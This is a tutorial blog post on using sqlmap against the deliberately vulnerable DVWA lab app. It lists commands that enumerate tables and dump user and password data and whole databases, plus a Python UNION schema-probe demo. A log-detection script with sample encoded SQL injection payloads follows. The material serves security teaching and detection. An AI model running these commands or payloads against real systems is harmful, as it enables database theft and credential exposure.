In the previous post, we demonstrated how to access user passwords in DVWA by exploiting its SQL injection vulnerability. This time, we’ll use sqlmap, a powerful and easy-to-use tool that automates the SQL injection exploitation process, allowing us to dump entire databases with minimal effort.
In the previous post, we guessed that the column in the users table containing passwords was called password. However, if our guess had been incorrect, we would have needed to inject a UNION SQL query against the DBMS’s information_schema database to retrieve the tables and columns of the targeted database. This process differs for each DBMS and can be time-consuming. Fortunately, sqlmap automates this process and more.
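To make the point concrete, here is an added example (not code from the original post) that reproduces the schema-enumeration step described above against a throwaway in-memory SQLite database, and shows why a parameterized query closes it. The users table is an assumption loosely modelled on DVWA’s, with placeholder rows, and SQLite’s sqlite_master catalogue stands in for MySQL’s information_schema.

```python
import sqlite3

# Constructed in-memory stand-in for DVWA's users table (sample rows, not DVWA's real data).
def build_db():
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (user_id INTEGER, first_name TEXT, last_name TEXT, password TEXT)"
    )
    conn.executemany(
        "INSERT INTO users VALUES (?, ?, ?, ?)",
        [(1, "admin", "admin", "<hash placeholder>"), (2, "Gordon", "Brown", "<hash placeholder>")],
    )
    return conn

def lookup_vulnerable(conn, user_id):
    # User input pasted straight into the SQL string, loosely modelled on DVWA's
    # low-security lookup (assumption). This is the defect sqlmap automates exploiting.
    query = f"SELECT first_name, last_name FROM users WHERE user_id = '{user_id}'"
    return conn.execute(query).fetchall()

def lookup_parameterized(conn, user_id):
    # Bound parameter: the driver passes the value separately, so it can never become SQL.
    return conn.execute(
        "SELECT first_name, last_name FROM users WHERE user_id = ?", (user_id,)
    ).fetchall()

# The manual step the post describes: UNION the lookup with the DBMS catalogue to read
# table and column definitions. SQLite's catalogue is sqlite_master; MySQL's is information_schema.
SCHEMA_PROBE = "' UNION SELECT name, sql FROM sqlite_master -- "

def leaked_table_ddl(conn):
    """Table names and CREATE statements the vulnerable lookup hands back for SCHEMA_PROBE."""
    rows = lookup_vulnerable(conn, SCHEMA_PROBE)
    return {name: ddl for name, ddl in rows if ddl and ddl.upper().startswith("CREATE TABLE")}

if __name__ == "__main__":
    db = build_db()
    print("normal lookup:", lookup_vulnerable(db, "1"))
    print("schema leaked through concatenation:", leaked_table_ddl(db))
    print("same probe through a bound parameter:", lookup_parameterized(db, SCHEMA_PROBE))
```

The concatenated version returns the CREATE statement of every table, column names included, which is exactly the information the guess in the previous post depended on; the bound-parameter version returns no rows for the same input because the probe is compared as a literal string.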
With sqlmap, we can automatically detect injectable parameters in a web application and dump whole databases, tables, and columns. It also has built-in exploitation and password cracking automation features, though we won’t be exploring those in this post as we will be using Metasploit and Hashcat for these purposes. Instead, we will focus on exploiting the same SQL injection vulnerability as in the previous post, performing information gathering on the server, and dumping all its databases.
First, we intercept the HTTP request of the SQL injection form with Burp and save it to a request file. We then hand this file to sqlmap with the -r option; sqlmap parses the saved request and tests the parameters it finds for SQL injection:
sqlmap -r request
Once sqlmap fingerprints the back-end DBMS (MySQL in this case), it asks whether to skip test payloads specific to other DBMSes; answering yes saves time. It then gathers information about the system, such as the version, current database, and current user.
If sqlmap successfully identifies an injectable parameter, it asks whether we want to continue testing the remaining parameters. If we’ve found what we need, we can stop here and move on to the next step.
Even after sqlmap exits, it keeps what it learned about the request (the injectable parameter and the technique that worked) in its output directory, so later runs against the same request file skip detection and go straight to the requested task. Let’s use sqlmap to gather more information, such as the database management system version, the current database, and the current user:
sqlmap -r request --banner --current-user --current-db
Now, let’s list the tables in the dvwa database:
sqlmap -r request -D dvwa --tables
Next, let’s list the columns in the users table:
sqlmap -r request -D dvwa -T users --columns
We can also dump the contents of the user and password columns in the users table:
sqlmap -r request -D dvwa -T users -C user,password --dump
If instead we want to dump the entire dvwa database (which is small in our case), we can use the following command:
sqlmap -r request -D dvwa --dump
As a bonus, we can also list all databases on the server:
sqlmap -r request -D dvwa --dbs
And, if we want to dump all databases on the server, we can use the following command:
sqlmap -r request --dump-all
In case you didn’t notice, the stored XSS that we discovered in a past post can be seen in the dumped data as well.
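The enumeration sequence above leaves a distinctive trail in the web server’s access log. As an added example (not code from the original post), the following script picks that trail out of combined-format log lines: it flags sqlmap’s default User-Agent and, separately, URL-decoded query strings carrying the UNION, information_schema and boolean or time-based fragments its test payloads use. The log format, the DVWA path and the sample lines are all constructed assumptions.

```python
import re
from urllib.parse import unquote_plus

# Apache/nginx "combined" access log format (assumption about the lab web server's logging).
LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"'
)

# Fragments that sqlmap's boolean-, UNION-, error- and time-based test payloads commonly
# carry; matched against the URL-decoded request so %27/%20 encoding does not hide them.
SQLI_RE = re.compile(
    r"union\s+(all\s+)?select|information_schema|sleep\s*\(|benchmark\s*\("
    r"|\b(and|or)\b\s+\d+\s*=\s*\d+|extractvalue\s*\(|updatexml\s*\(",
    re.IGNORECASE,
)

def classify(line):
    """Parse one log line and return the indicators it trips (empty list = nothing seen)."""
    m = LOG_RE.match(line)
    if not m:
        return None
    reasons = []
    # sqlmap's default User-Agent starts with "sqlmap/<version>"; --random-agent or
    # --user-agent replaces it, so this check alone is never sufficient.
    if "sqlmap" in m["ua"].lower():
        reasons.append("sqlmap user-agent")
    if SQLI_RE.search(unquote_plus(m["path"])):
        reasons.append("sqli payload in query")
    return {"ip": m["ip"], "path": m["path"], "reasons": reasons}

def suspicious_ips(lines):
    """Count flagged requests per client IP: a burst from one address is the sqlmap session."""
    counts = {}
    for line in lines:
        hit = classify(line)
        if hit and hit["reasons"]:
            counts[hit["ip"]] = counts.get(hit["ip"], 0) + 1
    return counts

# Constructed sample log lines (not real traffic); the DVWA path and version string are assumed.
SAMPLE_LOG = [
    '10.0.0.5 - - [12/Mar/2024:10:01:12 +0000] "GET /dvwa/vulnerabilities/sqli/?id=1&Submit=Submit HTTP/1.1" 200 1532 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [12/Mar/2024:10:02:03 +0000] "GET /dvwa/vulnerabilities/sqli/?id=2&Submit=Submit HTTP/1.1" 200 1532 "-" "sqlmap/1.7#stable (https://sqlmap.org)"',
    '10.0.0.9 - - [12/Mar/2024:10:02:04 +0000] "GET /dvwa/vulnerabilities/sqli/?id=1%27%20AND%201%3D1%20--%20&Submit=Submit HTTP/1.1" 200 1532 "-" "sqlmap/1.7#stable (https://sqlmap.org)"',
    '10.0.0.9 - - [12/Mar/2024:10:02:05 +0000] "GET /dvwa/vulnerabilities/sqli/?id=1%27%20UNION%20ALL%20SELECT%20table_name%2Ccolumn_name%20FROM%20information_schema.columns--%20&Submit=Submit HTTP/1.1" 200 4120 "-" "sqlmap/1.7#stable (https://sqlmap.org)"',
    '10.0.0.9 - - [12/Mar/2024:10:02:06 +0000] "GET /dvwa/vulnerabilities/sqli/?id=1%27%20AND%20SLEEP%285%29--%20&Submit=Submit HTTP/1.1" 200 1532 "-" "Mozilla/4.0 (compatible; MSIE 6.0)"',
]

if __name__ == "__main__":
    for line in SAMPLE_LOG:
        hit = classify(line)
        print(hit["ip"], hit["reasons"])
    print(suspicious_ips(SAMPLE_LOG))
```

The last sample line shows why the two checks are kept separate: with a spoofed User-Agent only the payload pattern fires, while the plain id=2 request from the same address is caught only by the agent string. Counting per source address ties the individual hits back into the single session that produced the dumps.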